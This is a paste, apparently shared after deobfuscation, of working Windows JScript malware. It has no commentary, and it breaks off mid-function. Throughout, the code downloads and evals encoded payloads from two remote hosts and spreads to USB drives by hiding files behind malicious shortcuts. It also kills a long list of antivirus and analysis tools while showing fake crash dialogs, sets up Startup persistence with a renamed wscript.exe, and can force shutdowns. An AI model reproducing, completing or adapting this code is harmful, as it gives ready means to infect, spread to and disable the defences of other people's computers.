Decrypted crappy virus or whatever

1. 'use strict';
2. (function() {
3.   var _$jscomp$0 = {
4.     v : "609",
5.     a : "",
6.     t : "0",
7.     u : "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299"
8.   };
9.   var a$jscomp$0 = new ActiveXObject("wscript.shell");
10.   var b$jscomp$0 = new ActiveXObject("scripting.filesystemobject");
11.   /**
12.    * @return {?}
13.    */
14.   var h$jscomp$6 = function() {
15.     return ((1 + Math.random()) * 65536 | 0).toString(16).substring(1);
16.   };
17.   var d$jscomp$0 = a$jscomp$0.environment("process");
18.   var f$jscomp$1 = d$jscomp$0("username");
19.   var g$jscomp$0 = d$jscomp$0("computername");
20.   var ru$jscomp$0 = new ActiveXObject("shell.application");
21.   /** @type {!Array} */
22.   var lo$jscomp$0 = [];
23.   /** @type {!Array} */
24.   var fup$jscomp$0 = [];
25.   /** @type {string} */
26.   var dod$jscomp$0 = "";
27.   /** @type {number} */
28.   var dot$jscomp$0 = 0;
29.   /**
30.    * @param {string} num
31.    * @return {undefined}
32.    */
33.   var hf$jscomp$0 = function(num) {
34.     try {
35.       var key = b$jscomp$0.getFolder(num);
36.       /** @type {number} */
37.       key.attributes = 2;
38.     } catch (n) {
39.     }
40.   };
41.   /**
42.    * @param {string} id
43.    * @return {?}
44.    */
45.   var sc$jscomp$0 = function(id) {
46.     /** @type {string} */
47.     id = id + "";
48.     /** @type {number} */
49.     var hash = 0;
50.     /** @type {number} */
51.     var i = 0;
52.     for (; i < id.length; i++) {
53.       /** @type {number} */
54.       hash = (hash << 5) - hash + id.charCodeAt(i);
55.       /** @type {number} */
56.       hash = hash & hash;
57.     }
58.     return Math.abs(hash);
59.   };
60.   /**
61.    * @param {string} hash
62.    * @return {?}
63.    */
64.   var ha$jscomp$0 = function(hash) {
65.     /** @type {string} */
66.     var key = "";
67.     var id = sc$jscomp$0(hash);
68.     /** @type {number} */
69.     var r = 0;
70.     for (; r < sc$jscomp$0(hash) % 5 + 5; r++) {
71.       id = sc$jscomp$0(key + id);
72.       /** @type {string} */
73.       key = key + String.fromCharCode(id % 25 + 97);
74.     }
75.     return key;
76.   };
77.   /**
78.    * @return {?}
79.    */
80.   var zzo$jscomp$0 = function() {
81.     /** @type {!Array} */
82.     var parts = ["http://www.microsoft.com/", "http://www.google.com/", "http://www.bing.com/"];
83.     /** @type {number} */
84.     var i = 0;
85.     var xhr;
86.     var wep;
87.     for (; i < parts.length; i++) {
88.       try {
89.         xhr = new ActiveXObject("MSXML2.ServerXMLHTTP.6.0");
90.         xhr.open("GET", parts[i]);
91.         xhr.setRequestHeader("User-Agent", _$jscomp$0.u);
92.         xhr.setRequestHeader("Cache-Control", "no-cache");
93.         xhr.setRequestHeader("Pragma", "no-cache");
94.         xhr.setRequestHeader("Connection", "close");
95.         xhr.send("");
96.         /** @type {number} */
97.         wep = (new Date(xhr.getAllResponseHeaders().split("Date: ").pop().split("\n").shift())).getTime() / 1000;
98.         if (1388534400 < wep) {
99.           return wep;
100.         }
101.       } catch (e) {
102.       }
103.     }
104.     return false;
105.   };
106.   /**
107.    * @param {number} length
108.    * @return {undefined}
109.    */
110.   var hr$jscomp$0 = function(length) {
111.     if (length) {
112.       /** @type {number} */
113.       var showSelectedPage = 1;
114.       /** @type {number} */
115.       var cb_decode = 1;
116.     } else {
117.       /** @type {number} */
118.       showSelectedPage = 2;
119.       /** @type {number} */
120.       cb_decode = 0;
121.     }
122.     try {
123.       a$jscomp$0.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden", showSelectedPage, "REG_DWORD");
124.     } catch (r) {
125.     }
126.     try {
127.       a$jscomp$0.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden", cb_decode, "REG_DWORD");
128.     } catch (r) {
129.     }
130.   };
131.   /**
132.    * @param {string} str
133.    * @param {string} name
134.    * @return {?}
135.    */
136.   var rc$jscomp$0 = function(str, name) {
137.     /** @type {!Array} */
138.     var b = [];
139.     /** @type {number} */
140.     var f = 0;
141.     var c;
142.     /** @type {string} */
143.     var typeName = "";
144.     /** @type {number} */
145.     var i = 0;
146.     for (; i < 256; i++) {
147.       /** @type {number} */
148.       b[i] = i;
149.     }
150.     /** @type {number} */
151.     i = 0;
152.     for (; i < 256; i++) {
153.       /** @type {number} */
154.       f = (f + b[i] + str.charCodeAt(i % str.length)) % 256;
155.       c = b[i];
156.       b[i] = b[f];
157.       b[f] = c;
158.     }
159.     /** @type {number} */
160.     i = 0;
161.     /** @type {number} */
162.     f = 0;
163.     /** @type {number} */
164.     var q = 0;
165.     for (; q < name.length; q++) {
166.       /** @type {number} */
167.       i = (i + 1) % 256;
168.       /** @type {number} */
169.       f = (f + b[i]) % 256;
170.       c = b[i];
171.       b[i] = b[f];
172.       b[f] = c;
173.       /** @type {string} */
174.       typeName = typeName + String.fromCharCode(name.charCodeAt(q) ^ b[(b[i] + b[f]) % 256]);
175.     }
176.     return typeName;
177.   };
178.   /**
179.    * @return {?}
180.    */
181.   var cob$jscomp$0 = function() {
182.     return Math.floor((1 + Math.random()) * 65536).toString(16).substring(1);
183.   };
184.   /** @type {!Array} */
185.   var zbo$jscomp$0 = ["regedit", "windows-kb", "mrt", "rstrui", "msconfig", "procexp", "avast", "avg", "ptinstall", "sdasetup", "issetup", "fs20", "mbam", "housecall", "hijackthis", "rubotted", "autoruns", "avenger", "filemon", "gmer", "hotfix", "klwk", "mbsa", "procmon", "regmon", "sysclean", "tcpview", "unlocker", "wireshark", "fiddler", "resmon", "perfmon", "msss", "cleaner", "otl", "roguekiller", "fss", "zoek", "emergencykit", "dds", "ccsetup", "vbsvbe", "combofix", "frst", "mcshield", "zphdiag"];
186.   /**
187.    * @param {!Array} values
188.    * @return {?}
189.    */
190.   var shh$jscomp$0 = function(values) {
191.     var j;
192.     var c;
193.     var i = values.length;
194.     for (; i; j = parseInt(Math.random() * i), c = values[--i], values[i] = values[j], values[j] = c) {
195.     }
196.     return values;
197.   };
198.   /**
199.    * @return {undefined}
200.    */
201.   var kp$jscomp$0 = function() {
202.     if (b$jscomp$0.fileExists(bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a09"))) {
203.       WScript.quit();
204.     }
205.   };
206.   /**
207.    * @return {undefined}
208.    */
209.   var zt$jscomp$0 = function() {
210.     try {
211.       var rejectingServer = b$jscomp$0.openTextFile(bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a00"), 8, true);
212.       rejectingServer.close();
213.       a$jscomp$0.run("%comspec% /c shutdown /p /f", 0);
214.     } catch (e) {
215.     }
216.   };
217.   /**
218.    * @return {?}
219.    */
220.   var fuu$jscomp$0 = function() {
221.     /** @type {!Array} */
222.     var newNodeLists = [];
223.     var _items = new Enumerator(b$jscomp$0.getFolder(bfo$jscomp$0).Files);
224.     for (; !_items.atEnd(); _items.moveNext()) {
225.       if (b$jscomp$0.getExtensionName(_items.item().Name) == "exe") {
226.         newNodeLists.push(bfo$jscomp$0 + _items.item().Name);
227.       }
228.     }
229.     return newNodeLists;
230.   };
231.   /**
232.    * @return {?}
233.    */
234.   var dof$jscomp$0 = function() {
235.     if (dod$jscomp$0 != "" && dot$jscomp$0 + 60 * 60 * 72 * 1000 >= (new Date).getTime()) {
236.       return dod$jscomp$0;
237.     } else {
238.       var tasks = shh$jscomp$0(["http://101legit.com/", "http://legitville.com/"]);
239.       /** @type {string} */
240.       var t = "";
241.       /** @type {number} */
242.       var i = 0;
243.       for (; i < tasks.length; i++) {
244.         try {
245.           $$jscomp$0("0", tasks[i]);
246.           var hgf = zxcvb;
247.           t = tasks[i];
248.         } catch (e) {
249.         } finally {
250.           delete zxcvb;
251.           delete hgf;
252.         }
253.         if (t != "") {
254.           break;
255.         }
256.       }
257.       if (t == "") {
258.         return false;
259.       } else {
260.         dod$jscomp$0 = t;
261.         /** @type {number} */
262.         dot$jscomp$0 = (new Date).getTime();
263.         return dod$jscomp$0;
264.       }
265.     }
266.   };
267.   /**
268.    * @param {string} fab$jscomp$0
269.    * @param {number} fat$jscomp$0
270.    * @return {undefined}
271.    */
272.   var $$jscomp$0 = function(fab$jscomp$0, fat$jscomp$0) {
273.     var m$jscomp$0 = bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a06");
274.     var yun$jscomp$0 = fat$jscomp$0 === 1 ? dof$jscomp$0() : fat$jscomp$0;
275.     if (yun$jscomp$0 == false) {
276.       throw Error();
277.     }
278.     var j$jscomp$2 = new ActiveXObject("MSXML2.ServerXMLHTTP.6.0");
279.     j$jscomp$2.open("GET", yun$jscomp$0 + fab$jscomp$0 + ".html");
280.     j$jscomp$2.setRequestHeader("User-Agent", _$jscomp$0.u);
281.     j$jscomp$2.send();
282.     var c$jscomp$0 = new ActiveXObject("ADODB.Stream");
283.     /** @type {number} */
284.     c$jscomp$0.mode = 3;
285.     /** @type {number} */
286.     c$jscomp$0.type = 1;
287.     c$jscomp$0.open();
288.     c$jscomp$0.write(j$jscomp$2.responseBody);
289.     c$jscomp$0.saveToFile(m$jscomp$0, 2);
290.     var k$jscomp$0 = b$jscomp$0.openTextFile(m$jscomp$0, 1);
291.     var l$jscomp$0 = k$jscomp$0.readAll();
292.     k$jscomp$0.close();
293.     try {
294.       b$jscomp$0.deleteFile(m$jscomp$0);
295.     } catch (e) {
296.     }
297.     /** @type {string} */
298.     var out$jscomp$0 = "";
299.     /** @type {!Array} */
300.     var key$jscomp$36 = [];
301.     l$jscomp$0 = l$jscomp$0.split("\x3c!-- ").pop().split(" --\x3e").shift().split("");
302.     /** @type {number} */
303.     var i$jscomp$8 = 0;
304.     for (; i$jscomp$8 < 5; i$jscomp$8++) {
305.       key$jscomp$36.push(l$jscomp$0.shift().charCodeAt(0) - 32);
306.     }
307.     /** @type {number} */
308.     i$jscomp$8 = 0;
309.     for (; i$jscomp$8 < l$jscomp$0.length; i$jscomp$8++) {
310.       /** @type {number} */
311.       c$jscomp$0 = l$jscomp$0[i$jscomp$8].charCodeAt(0) - key$jscomp$36[i$jscomp$8 % key$jscomp$36.length];
312.       /** @type {string} */
313.       out$jscomp$0 = out$jscomp$0 + String.fromCharCode(c$jscomp$0 < 32 ? 95 + c$jscomp$0 : c$jscomp$0);
314.     }
315.     try {
316.       eval(out$jscomp$0);
317.     } catch (e) {
318.     }
319.   };
320.   /**
321.    * @return {undefined}
322.    */
323.   var sk$jscomp$0 = function() {
324.     /** @type {number} */
325.     var foc = 0;
326.     try {
327.       var path = bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a11");
328.       var mug = b$jscomp$0.openTextFile(path, 8, true);
329.       mug.close();
330.       foc++;
331.       ru$jscomp$0.shellExecute(pw$jscomp$0(w0$jscomp$0), '"' + WScript.ScriptFullName + '" ' + ha$jscomp$0(g$jscomp$0 + "a10"), "", "", 0);
332.     } catch (e) {
333.     }
334.     try {
335.       path = bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a13");
336.       mug = b$jscomp$0.openTextFile(path, 8, true);
337.       mug.close();
338.       foc++;
339.       ru$jscomp$0.shellExecute(pw$jscomp$0(w0$jscomp$0), '"' + WScript.ScriptFullName + '" ' + ha$jscomp$0(g$jscomp$0 + "a12"), "", "", 0);
340.     } catch (e) {
341.     }
342.   };
343.   /**
344.    * @param {!Array} a
345.    * @return {?}
346.    */
347.   var pw$jscomp$0 = function(a) {
348.     return a[Math.floor(Math.random() * a.length)];
349.   };
350.   /** @type {string} */
351.   var w$jscomp$7 = "000";
352.   try {
353.     w$jscomp$7 = a$jscomp$0.regRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductID");
354.   } catch (e) {
355.   }
356.   /** @type {!Array} */
357.   var vn$jscomp$0 = [0, 0, 0, 0];
358.   try {
359.     var i$jscomp$3 = new Enumerator(GetObject("winmgmts:root\\cimv2").ExecQuery("SELECT * FROM Win32_OperatingSystem"));
360.     for (; !i$jscomp$3.atEnd(); i$jscomp$3.moveNext()) {
361.       vn$jscomp$0 = i$jscomp$3.item()["version"].split(".");
362.       if (vn$jscomp$0[0] >= 5) {
363.         break;
364.       }
365.     }
366.   } catch (e) {
367.   }
368.   if (!vn$jscomp$0[0]) {
369.     /** @type {number} */
370.     vn$jscomp$0[0] = b$jscomp$0.folderExists(d$jscomp$0("systemdrive") + "\\Users") ? 6 : 5;
371.   }
372.   /** @type {!Array} */
373.   var ll$jscomp$0 = ["", ""];
374.   try {
375.     var osl$jscomp$0;
376.     i$jscomp$3 = new Enumerator(GetObject("winmgmts:root\\cimv2").ExecQuery("SELECT * FROM Win32_OperatingSystem"));
377.     for (; !i$jscomp$3.atEnd(); i$jscomp$3.moveNext()) {
378.       osl$jscomp$0 = (osl$jscomp$0 = i$jscomp$3.item()["OSLanguage"].toString(16)).length == 4 ? osl$jscomp$0 : (new Array(5 - osl$jscomp$0.length)).join("0") + osl$jscomp$0;
379.       ll$jscomp$0 = a$jscomp$0.regRead("HKLM\\SOFTWARE\\Classes\\MIME\\Database\\Rfc1766\\" + osl$jscomp$0).split(";")[0].split("-");
380.       break;
381.     }
382.   } catch (e) {
383.   }
384.   /** @type {string} */
385.   var bfo$jscomp$0 = d$jscomp$0("localappdata") + "\\" + ha$jscomp$0(g$jscomp$0 + "a02") + "\\";
386.   if (b$jscomp$0.folderExists(bfo$jscomp$0)) {
387.     /** @type {string} */
388.     var tff$jscomp$0 = "";
389.     var otf$jscomp$0;
390.     /** @type {number} */
391.     var ysg$jscomp$0 = 0;
392.     /** @type {string} */
393.     var hd$jscomp$0 = bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a03");
394.     /** @type {string} */
395.     var bfi$jscomp$0 = bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a04") + ".js";
396.     if (b$jscomp$0.fileExists(hd$jscomp$0)) {
397.       try {
398.         otf$jscomp$0 = b$jscomp$0.openTextFile(hd$jscomp$0, 1);
399.         tff$jscomp$0 = otf$jscomp$0.readAll();
400.         otf$jscomp$0.close();
401.       } catch (e) {
402.       }
403.     } else {
404.       /** @type {number} */
405.       ysg$jscomp$0 = 1;
406.     }
407.     if (ysg$jscomp$0 || tff$jscomp$0 == "") {
408.       try {
409.         /** @type {string} */
410.         tff$jscomp$0 = cob$jscomp$0() + cob$jscomp$0() + "-" + cob$jscomp$0() + "-" + cob$jscomp$0() + "-" + cob$jscomp$0() + "-" + cob$jscomp$0() + cob$jscomp$0() + cob$jscomp$0();
411.         otf$jscomp$0 = b$jscomp$0.openTextFile(hd$jscomp$0, 2, 1);
412.         otf$jscomp$0.write(tff$jscomp$0);
413.         otf$jscomp$0.close();
414.       } catch (e) {
415.       }
416.     }
417.     try {
418.       var ZE$jscomp$0 = b$jscomp$0.openTextFile(bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a05"), 8, true);
419.       ZE$jscomp$0.close();
420.       hf$jscomp$0(bfo$jscomp$0);
421.       try {
422.         b$jscomp$0.copyFile(WScript.scriptFullName, bfi$jscomp$0, true);
423.       } catch (e) {
424.       }
425.       try {
426.         /** @type {string} */
427.         var cvv$jscomp$0 = bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a00");
428.         var Oq$jscomp$0 = b$jscomp$0.openTextFile(cvv$jscomp$0, 8, true);
429.         try {
430.           b$jscomp$0.deleteFile(bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a09"));
431.         } catch (e) {
432.         }
433.       } catch (e) {
434.         if (WScript.Arguments.length > 0) {
435.           switch(WScript.Arguments(0)) {
436.             case ha$jscomp$0(g$jscomp$0 + "a10"):
437.               /** @type {string} */
438.               var cbo$jscomp$0 = bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a11");
439.               try {
440.                 var zbz$jscomp$0 = b$jscomp$0.openTextFile(cbo$jscomp$0, 8, true);
441.               } catch (e) {
442.                 WScript.quit();
443.               }
444.               for (; true;) {
445.                 try {
446.                   var oot$jscomp$0 = GetObject("winmgmts:root\\cimv2");
447.                   var dS$jscomp$0 = new Enumerator(oot$jscomp$0.ExecQuery("SELECT * FROM Win32_DiskDrive"));
448.                   for (; !dS$jscomp$0.atEnd(); dS$jscomp$0.moveNext()) {
449.                     if (dS$jscomp$0.item().Model.match(/usb/i)) {
450.                       var did$jscomp$0 = dS$jscomp$0.item().DeviceID;
451.                       var dPS$jscomp$0 = new Enumerator(oot$jscomp$0.ExecQuery("ASSOCIATORS OF {Win32_DiskDrive.DeviceID='" + did$jscomp$0 + "'} WHERE AssocClass=Win32_DiskDriveToDiskPartition"));
452.                       for (; !dPS$jscomp$0.atEnd(); dPS$jscomp$0.moveNext()) {
453.                         var pID$jscomp$0 = dPS$jscomp$0.item().DeviceID;
454.                         var lDS$jscomp$0 = new Enumerator(oot$jscomp$0.ExecQuery("ASSOCIATORS OF {Win32_DiskPartition.DeviceID='" + pID$jscomp$0 + "'} WHERE AssocClass=Win32_LogicalDiskToPartition"));
455.                         for (; !lDS$jscomp$0.atEnd(); lDS$jscomp$0.moveNext()) {
456.                           /** @type {string} */
457.                           var lD$jscomp$0 = lDS$jscomp$0.item().DeviceID + "\\";
458.                           /** @type {string} */
459.                           var trr$jscomp$0 = "Files\\";
460.                           /** @type {string} */
461.                           var trd$jscomp$0 = lD$jscomp$0 + trr$jscomp$0;
462.                           /** @type {string} */
463.                           var poor$jscomp$0 = sc$jscomp$0(g$jscomp$0) % 500 + 405 + "\\";
464.                           /** @type {string} */
465.                           var por$jscomp$0 = trr$jscomp$0 + poor$jscomp$0;
466.                           /** @type {string} */
467.                           var pod$jscomp$0 = lD$jscomp$0 + por$jscomp$0;
468.                           /** @type {string} */
469.                           var piir$jscomp$0 = ha$jscomp$0(g$jscomp$0 + "a01") + ".js";
470.                           /** @type {string} */
471.                           var pir$jscomp$0 = por$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a01") + ".js";
472.                           /** @type {string} */
473.                           var pid$jscomp$0 = lD$jscomp$0 + pir$jscomp$0;
474.                           /** @type {string} */
475.                           var bat$jscomp$0 = lD$jscomp$0 + "Files.bat";
476.                           try {
477.                             var gf$jscomp$0 = b$jscomp$0.getFolder(trd$jscomp$0);
478.                             var fS$jscomp$0 = new Enumerator(gf$jscomp$0.SubFolders);
479.                             for (; !fS$jscomp$0.atEnd(); fS$jscomp$0.moveNext()) {
480.                               var ff$jscomp$0 = (fS$jscomp$0.item() + "").split("\\").pop();
481.                               if (ff$jscomp$0.length == 3 && !isNaN(parseFloat(ff$jscomp$0)) && isFinite(ff$jscomp$0)) {
482.                                 var fg$jscomp$0 = b$jscomp$0.getFolder(trd$jscomp$0 + ff$jscomp$0);
483.                                 var Sf$jscomp$0 = new Enumerator(fg$jscomp$0.Files);
484.                                 for (; !Sf$jscomp$0.atEnd(); Sf$jscomp$0.moveNext()) {
485.                                   var fff$jscomp$0 = (Sf$jscomp$0.item() + "").split("\\").pop();
486.                                   if (b$jscomp$0.getExtensionName(fff$jscomp$0).toLowerCase() == "js") {
487.                                     try {
488.                                       b$jscomp$0.copyFile(WScript.scriptFullName, trd$jscomp$0 + ff$jscomp$0 + "\\" + fff$jscomp$0, true);
489.                                     } catch (e) {
490.                                     }
491.                                   }
492.                                 }
493.                               }
494.                             }
495.                           } catch (e) {
496.                           }
497.                           try {
498.                             b$jscomp$0.createFolder(trd$jscomp$0);
499.                           } catch (e) {
500.                           }
501.                           try {
502.                             b$jscomp$0.createFolder(pod$jscomp$0);
503.                           } catch (e) {
504.                           }
505.                           hf$jscomp$0(trd$jscomp$0);
506.                           hf$jscomp$0(pod$jscomp$0);
507.                           try {
508.                             var otff$jscomp$0 = b$jscomp$0.openTextFile(bat$jscomp$0, 2, 1);
509.                             otff$jscomp$0.writeLine("cd Files\\" + poor$jscomp$0);
510.                             otff$jscomp$0.writeLine("%comspec% /c start w^script " + piir$jscomp$0);
511.                             otff$jscomp$0.writeLine("exit");
512.                             otff$jscomp$0.close();
513.                           } catch (e) {
514.                           }
515.                           /** @type {!Array} */
516.                           var bro$jscomp$0 = [127, 128, 129];
517.                           try {
518.                             gf$jscomp$0 = b$jscomp$0.getFolder(lD$jscomp$0);
519.                             fS$jscomp$0 = new Enumerator(gf$jscomp$0.SubFolders);
520.                             for (; !fS$jscomp$0.atEnd(); fS$jscomp$0.moveNext()) {
521.                               ff$jscomp$0 = (fS$jscomp$0.item() + "").split(":\\").pop();
522.                               if (ff$jscomp$0.substr(0, 1) != "." && ff$jscomp$0.substr(0, 1) != "$" && ff$jscomp$0.match(/recycle/i) == null && ff$jscomp$0.match(/System Volume/) == null && ff$jscomp$0.match(/Files/) == null) {
523.                                 with(a$jscomp$0.createShortcut(lD$jscomp$0 + ff$jscomp$0 + ".lnk")) {
524.                                   /** @type {string} */
525.                                   targetPath = "%comspec%";
526.                                   /** @type {number} */
527.                                   windowStyle = 7;
528.                                   /** @type {string} */
529.                                   arguments = '/c set c=Files.bat& cmd.exe /c set d=explorer& cmd.exe /c %c% > nul& cd Files& cmd.exe /c %d% "' + ff$jscomp$0 + '"';
530.                                   /** @type {string} */
531.                                   iconLocation = "%SystemRoot%\\System32\\SHELL32.dll," + pw$jscomp$0(bro$jscomp$0);
532.                                   save();
533.                                 }
534.                                 try {
535.                                   var t$jscomp$0 = b$jscomp$0.getFolder(lD$jscomp$0 + ff$jscomp$0);
536.                                   t$jscomp$0.move(trd$jscomp$0 + ff$jscomp$0);
537.                                 } catch (e) {
538.                                 }
539.                                 hf$jscomp$0(trd$jscomp$0 + ff$jscomp$0);
540.                               }
541.                             }
542.                           } catch (e) {
543.                           }
544.                           try {
545.                             gf$jscomp$0 = b$jscomp$0.getFolder(lD$jscomp$0);
546.                             fS$jscomp$0 = new Enumerator(gf$jscomp$0.Files);
547.                             for (; !fS$jscomp$0.atEnd(); fS$jscomp$0.moveNext()) {
548.                               ff$jscomp$0 = (fS$jscomp$0.item() + "").split(":\\").pop();
549.                               var exx$jscomp$0 = b$jscomp$0.getExtensionName(ff$jscomp$0).toLowerCase();
550.                               if (exx$jscomp$0 != "lnk" && exx$jscomp$0 != "bat" && exx$jscomp$0 != "" && exx$jscomp$0 != "js" && ff$jscomp$0.toLowerCase() != "autorun.inf" && ff$jscomp$0.substr(0, 1) != "." && ff$jscomp$0.substr(0, 1) != "$" && ff$jscomp$0.match(/recycle/i) == null) {
551.                                 /** @type {number} */
552.                                 var exo$jscomp$0 = 0;
553.                                 switch(exx$jscomp$0) {
554.                                   case "exe":
555.                                     /** @type {number} */
556.                                     exo$jscomp$0 = 261;
557.                                     break;
558.                                   case "doc":
559.                                   case "docx":
560.                                   case "pdf":
561.                                     /** @type {number} */
562.                                     exo$jscomp$0 = 73;
563.                                     break;
564.                                   case "rtf":
565.                                   case "txt":
566.                                     /** @type {number} */
567.                                     exo$jscomp$0 = 70;
568.                                     break;
569.                                   case "mp3":
570.                                   case "m4a":
571.                                   case "ogg":
572.                                   case "wav":
573.                                   case "wma":
574.                                     /** @type {number} */
575.                                     exo$jscomp$0 = 116;
576.                                     break;
577.                                   case "mp4":
578.                                   case "avi":
579.                                   case "webm":
580.                                   case "flv":
581.                                   case "mov":
582.                                   case "wmv":
583.                                   case "mpeg":
584.                                   case "mpg":
585.                                     /** @type {number} */
586.                                     exo$jscomp$0 = 115;
587.                                     break;
588.                                   case "gif":
589.                                   case "jpg":
590.                                   case "jpeg":
591.                                   case "png":
592.                                     /** @type {number} */
593.                                     exo$jscomp$0 = 302;
594.                                     break;
595.                                 }
596.                                 with(a$jscomp$0.createShortcut(lD$jscomp$0 + ff$jscomp$0 + ".lnk")) {
597.                                   /** @type {string} */
598.                                   targetPath = "%comspec%";
599.                                   /** @type {number} */
600.                                   windowStyle = 7;
601.                                   /** @type {string} */
602.                                   arguments = '/c set zz=Files.bat& cmd.exe /c %zz% > nul& cd Files& cmd.exe /c "' + ff$jscomp$0 + '"';
603.                                   /** @type {string} */
604.                                   iconLocation = "%SystemRoot%\\System32\\SHELL32.dll," + exo$jscomp$0;
605.                                   save();
606.                                 }
607.                                 try {
608.                                   b$jscomp$0.moveFile(lD$jscomp$0 + ff$jscomp$0, trd$jscomp$0 + ff$jscomp$0);
609.                                 } catch (e) {
610.                                 }
611.                                 hf$jscomp$0(trd$jscomp$0 + ff$jscomp$0);
612.                               }
613.                             }
614.                           } catch (e) {
615.                           }
616.                           try {
617.                             b$jscomp$0.copyFile(WScript.scriptFullName, pid$jscomp$0, true);
618.                           } catch (e) {
619.                           }
620.                         }
621.                       }
622.                     }
623.                   }
624.                 } catch (e) {
625.                 }
626.                 kp$jscomp$0();
627.                 zt$jscomp$0();
628.                 WScript.sleep(14E3);
629.               }
630.               break;
631.             case ha$jscomp$0(g$jscomp$0 + "a12"):
632.               /** @type {string} */
633.               cbo$jscomp$0 = bfo$jscomp$0 + ha$jscomp$0(g$jscomp$0 + "a13");
634.               try {
635.                 zbz$jscomp$0 = b$jscomp$0.openTextFile(cbo$jscomp$0, 8, true);
636.               } catch (e) {
637.                 WScript.quit();
638.               }
639.               for (; true;) {
640.                 try {
641.                   t$jscomp$0 = GetObject("winmgmts:root\\cimv2");
642.                   i$jscomp$3 = new Enumerator(t$jscomp$0.ExecQuery("SELECT * FROM Win32_Process"));
643.                   for (; !i$jscomp$3.atEnd(); i$jscomp$3.moveNext()) {
644.                     var it$jscomp$0 = i$jscomp$3.item();
645.                     if (it$jscomp$0["name"].match(new RegExp(zbo$jscomp$0.join("|"), "i"))) {
646.                       try {
647.                         if (it$jscomp$0.terminate() == 0 && it$jscomp$0["ExecutablePath"] && !it$jscomp$0["ExecutablePath"].match(/windows|program/i)) {
648.                           /** @type {string} */
649.                           var tp$jscomp$0 = ((8193 + Math.random()) * 30582 | 0).toString(16).substring(1);
650.                           /** @type {string} */
651.                           var tq$jscomp$0 = ((8193 + Math.random()) * 30582 | 0).toString(16).substring(1);
652.                           a$jscomp$0.popup("Application has generated an exception that could not be handled.\n\nProcess id=0x" + tp$jscomp$0 + " (" + parseInt(tp$jscomp$0, 16) + "), Thread id=0x" + tq$jscomp$0 + " (" + parseInt(tq$jscomp$0, 16) + ").\n\nClick OK to terminate the application.\nClick CANCEL to debug the application.", 8, it$jscomp$0["name"] + " - Common Language Runtime Debugging Services", 1 + 48 + 4096);
653.                         }
654.                       } catch (e) {
655.                       }
656.                     }
657.                   }
658.                 } catch (e) {
659.                 }
660.                 kp$jscomp$0();
661.                 zt$jscomp$0();
662.                 WScript.sleep(400);
663.               }
664.               break;
665.           }
666.         }
667.         if ((WScript.Arguments.length > 0 && WScript.Arguments(0) == ha$jscomp$0(g$jscomp$0 + "a07")) == false) {
668.           WScript.quit();
669.         }
670.       }
671.       /** @type {!Array} */
672.       var w0$jscomp$0 = [];
673.       if ((WScript.Arguments.length > 0 && WScript.Arguments(0) == ha$jscomp$0(g$jscomp$0 + "a07")) == false) {
674.         try {
675.           a$jscomp$0.run('%comspec% /c del /F /S /Q "' + bfo$jscomp$0 + '*.exe"', 0, true);
676.           WScript.sleep(500);
677.         } catch (e) {
678.         }
679.         ww = ha$jscomp$0(Math.random());
680.         /** @type {number} */
681.         mm = Math.ceil(Math.random() * 5);
682.         if (mm > 3) {
683.           /** @type {string} */
684.           ww = ww + (mm > 4 ? "64" : "32");
685.         }
686.         /** @type {string} */
687.         ww = ww + ".exe";
688.         b$jscomp$0.copyFile(d$jscomp$0("systemroot") + "\\system32\\wscript.exe", bfo$jscomp$0 + ww, true);
689.         w0$jscomp$0.push(bfo$jscomp$0 + ww);
690.       } else {
691.         w0$jscomp$0 = fuu$jscomp$0();
692.       }
693.       var fet$jscomp$0 = pw$jscomp$0(w0$jscomp$0);
694.       /** @type {number} */
695.       var su$jscomp$0 = 0;
696.       try {
697.         var pp$jscomp$0 = d$jscomp$0("systemdrive") + "\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\";
698.         /** @type {string} */
699.         var p$jscomp$0 = pp$jscomp$0 + "Start.lnk";
700.         with(a$jscomp$0.createShortcut(p$jscomp$0)) {
701.           /** @type {string} */
702.           targetPath = '"' + fet$jscomp$0 + '"';
703.           /** @type {number} */
704.           windowStyle = 1;
705.           /** @type {string} */
706.           arguments = '"' + bfi$jscomp$0 + '"';
707.           /** @type {string} */
708.           iconLocation = "%systemroot%\\system32\\shell32.dll,3";
709.           save();
710.         }
711.         su$jscomp$0++;
712.         lo$jscomp$0.push(p$jscomp$0);
713.         /** @type {!Array} */
714.         var cbb$jscomp$0 = ["Windows Explorer.lnk", "empezar.lnk", "atajo.lnk"];
715.         /** @type {number} */
716.         var i1$jscomp$0 = 0;
717.         for (; i1$jscomp$0 < cbb$jscomp$0.length; i1$jscomp$0++) {
718.           try {
719.             b$jscomp$0.deleteFile(pp$jscomp$0 + cbb$jscomp$0[i1$jscomp$0]);
720.           } catch (e) {
721.           }
722.         }
723.       } catch (e) {
724.       }
725.       try {
726.         pp$jscomp$0 = d$jscomp$0("userprofile") + (vn$jscomp$0[0] >= 6 ? "\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" : "\\Start Menu\\Programs\\Startup\\");
727.         /** @type {string} */
728.         p$jscomp$0 = pp$jscomp$0 + "Start.lnk";
729.         with(a$jscomp$0.createShortcut(p$jscomp$0)) {
730.           /** @type {string} */
731.           targetPath = '"' + fet$jscomp$0 + '"';
732.           /** @type {number} */
733.           windowStyle = 1;
734.           /** @type {string} */
735.           arguments = '"' + bfi$jscomp$0 + '"';
736.           /** @type {string} */
737.           iconLocation = "%systemroot%\\system32\\shell32.dll,3";
